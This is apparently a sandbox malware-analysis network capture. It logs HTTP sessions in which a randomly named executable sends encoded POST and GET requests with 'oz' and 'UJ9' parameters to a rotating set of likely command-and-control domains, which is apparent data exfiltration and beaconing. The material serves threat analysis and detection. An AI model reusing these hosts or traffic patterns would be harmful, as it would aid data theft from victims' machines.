Vary: Accept-Encoding
ETag: "66fec433-4a47"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.11.20 | 49784 | 3.33.130.190 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe

Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:10:25.202219963 CEST | 807 | OUT | POST /dlt0/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.tukaari.shop
Origin: http://www.tukaari.shop
Referer: http://www.tukaari.shop/dlt0/
Content-Length: 199
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.11.20 | 49785 | 3.33.130.190 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe

Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:10:27.828198910 CEST | 827 | OUT | POST /dlt0/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.tukaari.shop
Origin: http://www.tukaari.shop
Referer: http://www.tukaari.shop/dlt0/
Content-Length: 219
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.11.20 | 49786 | 3.33.130.190 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe

Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:10:30.474956989 CEST | 1289 | OUT | POST /dlt0/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.tukaari.shop
Origin: http://www.tukaari.shop
Referer: http://www.tukaari.shop/dlt0/
Content-Length: 7367
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.11.20 | 49787 | 3.33.130.190 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:10:33.107224941 CEST | 547 | OUT | GET /dlt0/?oz=9mltyUpqTpNFGgiLLM/QIt0JA1EyaLVwbNO6LVK8xMKAahqO0kx85NrrrztI4+WdJ+WmFSXeCNM39PHdIGjD1nD8ckOcgacQtsimUjnJeyDglSYeX59cdP4=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.tukaari.shop
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:10:34.124681950 CEST | 399 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Fri, 04 Oct 2024 06:10:34 GMT
Content-Type: text/html
Content-Length: 259
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?oz=9mltyUpqTpNFGgiLLM/QIt0JA1EyaLVwbNO6LVK8xMKAahqO0kx85NrrrztI4+WdJ+WmFSXeCNM39PHdIGjD1nD8ckOcgacQtsimUjnJeyDglSYeX59cdP4=&UJ9=qN-llTKPHxntPrv0"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.11.20 | 49788 | 13.248.169.48 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:11:08.400270939 CEST | 810 | OUT | POST /tcs6/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.invicta.world
Origin: http://www.invicta.world
Referer: http://www.invicta.world/tcs6/
Content-Length: 199
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.11.20 | 49789 | 13.248.169.48 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:11:11.038558006 CEST | 830 | OUT | POST /tcs6/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.invicta.world
Origin: http://www.invicta.world
Referer: http://www.invicta.world/tcs6/
Content-Length: 219
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.11.20 | 49790 | 13.248.169.48 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:11:13.681725025 CEST | 2578 | OUT | POST /tcs6/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.invicta.world
Origin: http://www.invicta.world
Referer: http://www.invicta.world/tcs6/
Content-Length: 7367
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.11.20 | 49791 | 13.248.169.48 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:11:16.318273067 CEST | 548 | OUT | GET /tcs6/?oz=UTr2VQMVaNknAPhv8pO5HUt/aSD/OuAvYfufonxWcuzqKYzjt00ESHNOp8OZd4NYpPhYAhKEfFByAl9/w+FcumGXOFp58MMDhVPqk9564kxN8Oc8kW08N+s=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.invicta.world
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:11:16.420979023 CEST | 399 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Fri, 04 Oct 2024 06:11:16 GMT
Content-Type: text/html
Content-Length: 259
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?oz=UTr2VQMVaNknAPhv8pO5HUt/aSD/OuAvYfufonxWcuzqKYzjt00ESHNOp8OZd4NYpPhYAhKEfFByAl9/w+FcumGXOFp58MMDhVPqk9564kxN8Oc8kW08N+s=&UJ9=qN-llTKPHxntPrv0"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.11.20 | 49792 | 3.33.130.190 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:11:21.535525084 CEST | 831 | OUT | POST /bqye/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.whats-in-the-box.org
Origin: http://www.whats-in-the-box.org
Referer: http://www.whats-in-the-box.org/bqye/
Content-Length: 199
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.11.20 | 49793 | 3.33.130.190 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:11:24.175199986 CEST | 851 | OUT | POST /bqye/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.whats-in-the-box.org
Origin: http://www.whats-in-the-box.org
Referer: http://www.whats-in-the-box.org/bqye/
Content-Length: 219
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.11.20 | 49794 | 3.33.130.190 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:11:26.815181017 CEST | 1289 | OUT | POST /bqye/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.whats-in-the-box.org
Origin: http://www.whats-in-the-box.org
Referer: http://www.whats-in-the-box.org/bqye/
Content-Length: 7367
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:11:26.815258026 CEST | 3867 | OUT
Oct 4, 2024 08:11:26.815279961 CEST | 2844 | OUT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.11.20 | 49795 | 3.33.130.190 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:11:29.455898046 CEST | 555 | OUT | GET /bqye/?UJ9=qN-llTKPHxntPrv0&oz=orBWFM4TMH6bEQWb0mufnyz8+/9zteVW//lS5P1UVpZ6i4UA1urKkBRolapSd+D0qVvV/pdb4OKcqrb8qmiU7f8Sw/VtSC1B9WeqmjWWYlIhrofH/7u6E+o= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.whats-in-the-box.org
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:11:29.558336020 CEST | 399 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Fri, 04 Oct 2024 06:11:29 GMT
Content-Type: text/html
Content-Length: 259
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?UJ9=qN-llTKPHxntPrv0&oz=orBWFM4TMH6bEQWb0mufnyz8+/9zteVW//lS5P1UVpZ6i4UA1urKkBRolapSd+D0qVvV/pdb4OKcqrb8qmiU7f8Sw/VtSC1B9WeqmjWWYlIhrofH/7u6E+o="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.11.20 | 49796 | 3.33.130.190 | 80 | 4180 | C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:11:34.675734043 CEST | 813 | OUT | POST /was5/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.linkwave.cloud
Origin: http://www.linkwave.cloud
Referer: http://www.linkwave.cloud/was5/
Content-Length: 199
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port
67 | 192.168.11.20 | 49797 | 3.33.130.190 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:11:37.317085028 CEST | 833 | OUT | POST /was5/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.linkwave.cloud
Origin: http://www.linkwave.cloud
Referer: http://www.linkwave.cloud/was5/
Content-Length: 219
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port
68 | 192.168.11.20 | 49798 | 3.33.130.190 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:11:39.954304934 CEST | 1289 | OUT | POST /was5/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.linkwave.cloud
Origin: http://www.linkwave.cloud
Referer: http://www.linkwave.cloud/was5/
Content-Length: 7367
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:11:39.954355001 CEST | 3867 | OUT
Oct 4, 2024 08:11:39.954404116 CEST | 2826 | OUT


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              69192.168.11.20497993.33.130.19080
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:11:42.590176105 CEST549OUTGET /was5/?oz=y8MnD3CAUjfvlbCaxAVac63GvK68hywkVQck0F03MMraCQdP6i6ahgEcKS99S8jCMAfRd1EgvYBIkI1gFr2JNRymkxf7KUrPibiqIzK4PCKgQN9qHiwVnD0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.linkwave.cloud
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:11:42.691457033 CEST | 399 | IN | HTTP/1.1 200 OK
                                                                                                                                              Server: openresty
                                                                                                                                              Date: Fri, 04 Oct 2024 06:11:42 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 259
                                                                                                                                              Connection: close
                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?oz=y8MnD3CAUjfvlbCaxAVac63GvK68hywkVQck0F03MMraCQdP6i6ahgEcKS99S8jCMAfRd1EgvYBIkI1gFr2JNRymkxf7KUrPibiqIzK4PCKgQN9qHiwVnD0=&UJ9=qN-llTKPHxntPrv0"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
70 | 192.168.11.20 | 49800 | 84.32.84.32 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:11:47.810385942 CEST | 816 | OUT | POST /7k8f/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dfmagazine.shop
                                                                                                                                              Origin: http://www.dfmagazine.shop
                                                                                                                                              Referer: http://www.dfmagazine.shop/7k8f/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=4z1WU9RqYjadMpuPDBvNvyXl0j97Tu3uZMyE5u6eArwA3Iz/dgm5xv99OYzuFpGw+walanqJAid/pmDC4y4rHCDiAVA2mPsi6XotBm5ce4D1rjs18BpIanJUGpwyUEKvD3FiptJBbqkVyW4K4JbNChVwO6UuUxr694T5l8TR2A2Rpw0Vdo48MBDEf8R5PIeJRw==


Session ID | Source IP | Source Port | Destination IP | Destination Port
71 | 192.168.11.20 | 49801 | 84.32.84.32 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:11:50.452119112 CEST | 836 | OUT | POST /7k8f/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dfmagazine.shop
                                                                                                                                              Origin: http://www.dfmagazine.shop
                                                                                                                                              Referer: http://www.dfmagazine.shop/7k8f/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=4z1WU9RqYjadNJ+PPCHNqSXmpT97K+3qZM+E5uTDAdIAwoD/chm50v99JozvBpG/+wetamWJAiJ/pmTC5D4oBSDgP1A0pvsi6XotBnd2e4L1oTc1uwpHZnJbMJwyD0KrD3ENpsUkbv4VyXIK5bzOIhV6EaV5TQyK4M2Mk9KD/lKMsmlPAaMYPSf2bMoRNKfSM6Xv3zTP6LXywSgat2MT7pg=


Session ID | Source IP | Source Port | Destination IP | Destination Port
72 | 192.168.11.20 | 49802 | 84.32.84.32 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:11:53.091892004 CEST | 2578 | OUT | POST /7k8f/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dfmagazine.shop
                                                                                                                                              Origin: http://www.dfmagazine.shop
                                                                                                                                              Referer: http://www.dfmagazine.shop/7k8f/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port
73 | 192.168.11.20 | 49803 | 84.32.84.32 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:11:55.729990959 CEST | 550 | OUT | GET /7k8f/?oz=1xd2XIdTc2qaFZ+FWSTYli7OxzQOBufybu6t7KDIboRfwcHmUmPthK5WfpWTXJmR/FSLDU2eJw9bxVvh/BR2RAGhDgY7k/sU7CIWPHYqUL7qqxcngXtaZyk=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dfmagazine.shop
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Oct 4, 2024 08:11:55.831248999 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                              Server: hcdn
                                                                                                                                              Date: Fri, 04 Oct 2024 06:11:55 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 10072
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              x-hcdn-request-id: d792afb1d6d873eb066a690ae75c39ba-bos-edge1
                                                                                                                                              Expires: Fri, 04 Oct 2024 06:11:54 GMT
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;


Session ID | Source IP | Source Port | Destination IP | Destination Port
74 | 192.168.11.20 | 49804 | 54.67.87.110 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:12:01.004034996 CEST | 795 | OUT | POST /txr6/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.ngmr.xyz
                                                                                                                                              Origin: http://www.ngmr.xyz
                                                                                                                                              Referer: http://www.ngmr.xyz/txr6/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Ascii: oz=qRo7UWlGE2pUjX1GvRfcsDJjcuyOmHkIDr9TBB+ETZ0+INBdx/5maRbfm/TtzrI9Ie/VLkBRAXnQ5DxKjBnB2Tg+qWc24zm8iKBqUXZzBQMBtbZ6fV8c24uQ0n3zfauNJhp9z/Em4Wmw7owstNwyQxtEL9Pq2xz5Vs4+IU1nq4H44++y/Xp9dq16KZUivNrUpQ==
Oct 4, 2024 08:12:01.158198118 CEST | 550 | IN | HTTP/1.1 404 Not Found
                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                              Content-Length: 282
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Date: Fri, 04 Oct 2024 06:34:49 GMT
                                                                                                                                              X-Varnish: 1110524998
                                                                                                                                              Age: 0
                                                                                                                                              Via: 1.1 varnish
                                                                                                                                              Connection: close
                                                                                                                                              X-Varnish-Cache: MISS
                                                                                                                                              Server: C2M Server v1.02
                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
75 | 192.168.11.20 | 49805 | 54.67.87.110 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 08:12:03.689009905 CEST | 815 | OUT | POST /txr6/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.ngmr.xyz
                                                                                                                                              Origin: http://www.ngmr.xyz
                                                                                                                                              Referer: http://www.ngmr.xyz/txr6/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
